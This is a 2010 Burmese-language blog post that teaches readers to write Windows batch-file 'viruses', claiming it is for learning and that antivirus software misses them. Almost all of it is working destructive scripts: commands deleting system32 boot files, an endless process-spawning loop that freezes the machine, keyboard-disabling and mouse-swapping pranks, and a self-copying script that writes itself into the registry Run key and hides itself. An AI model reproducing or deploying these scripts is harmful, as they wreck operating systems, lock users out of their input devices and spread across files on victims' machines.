Thursday, May 6, 2010

virus ေရးနည္းေနာက္တမ်ိဳး

virus ေရးနည္းဆိုေပမယ့္...သူမ်ားေတြကိုဒုကၡေပးဖို႔မဟုတ္ပါဘူး...ေရးပံုေရးနည္းေလးေတြသိရေအာင္လို႔ပါ....
တကယ္အႏၱာရယ္ရွိတဲ့ virusေရးနည္းေတြပါ...ဗဟုသုတအေနနဲ႔ေပါ့...bat file အေနနဲ႔ သိမ္းတဲ့အတြက္ ဘယ္Antivirus မွမမိပါဘူး... virus ေရးပံု သိသြားၿပီဆိုရင္ေတာ့ ကိုယ္တိုင္Simple virs ေတြကိုေရးႏိုင္ေအာင္ႀကိဳးစားၾကပါ....စေရးၾကည့္ရေအာင္...

del "C:\windows\system32\bootok" /Q/S >nul
del "C:\windows\system32\bootvid" /Q/S >nul
del "C:\windows\system32\bootvrfy" /Q/S >nul

del ဆိုတာကfile ေတြကိုဖ်က္ပစ္ဖို႔ command ေပးတာပါ....အေပၚကအခ်က္သံုးခ်က္ကို notepad
ထဲမွာေရးၿပီးေတာ့ .bat(or).exe file ဥပမာ(virus.bat or virus.exe)တစ္မ်ိဳးမ်ိဳးနဲ႔သိမ္းၿပီးေတာ့....?
အထပ္ပါေရးနည္းေတြကို blog ေတာ္ေတာ္မ်ားမ်ားမွာဖတ္႐ႈႏိုင္ပါတယ္....


ေပ်ာ္စရာေကာင္းတဲ့virus တစ္မ်ိဳးေရးၾကည့္ၾကရေအာင္..ဒီဗိုင္းရပ္စ္ေလးကိုေရးၿပီး run ၾကည့္မိရင္
ဘာkey နဲ႔မွ ပိတ္လို႔မရေအာင္ တစ္ခုၿပီးတစ္ခုတပ္လာပါလိမ့္မယ္....တစ္ခ်ိဳ႕ကေတာ့(automatic bomb)virus လို႔လည္း ေခၚၾကပါတယ္...

@echo off
:A
start dir
start command
start firefox
start explorer
start notepad
goto:A

notepadနဲ႔ေရးၿပီး .bat file အေနနဲ႔သိမ္းၿပီး run ၾကည့္ပါ...restart ျပန္ခ်မွ ျပန္ၿပီးအစဥ္ေျပသြားပါလိမ့္မယ္...
ေပ်ာ္စရာလည္းေကာင္းပါတယ္...:D


Keyboard Disabled လုပ္တဲ့ virus ပါ...

@echo off
title Error
rundll32.exe keyboard.dll,disable

and then save .bat fiel...ok


ဒါေလးကေနာက္တစ္နည္း
How to Swap Mouse Buttons Every Seconds:

@echo off
title Fatal Error
goto 1

:1
RUNDLL32.EXE USER32.DLL,SwapMouseButton
goto 1



အလြယ္ဆံုး Virus ေရးနည္း...
@Echo off
color 4
title 4
title R.I.P
start
start
start
start calc
copy %0 %Systemroot%\Greatgame > nul
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Greatgame /t REG_SZ
/d %systemroot%\Greatgame.bat /f > nul
copy %0 *.bat > nul
Attrib +r +h [...]

No comments:

Post a Comment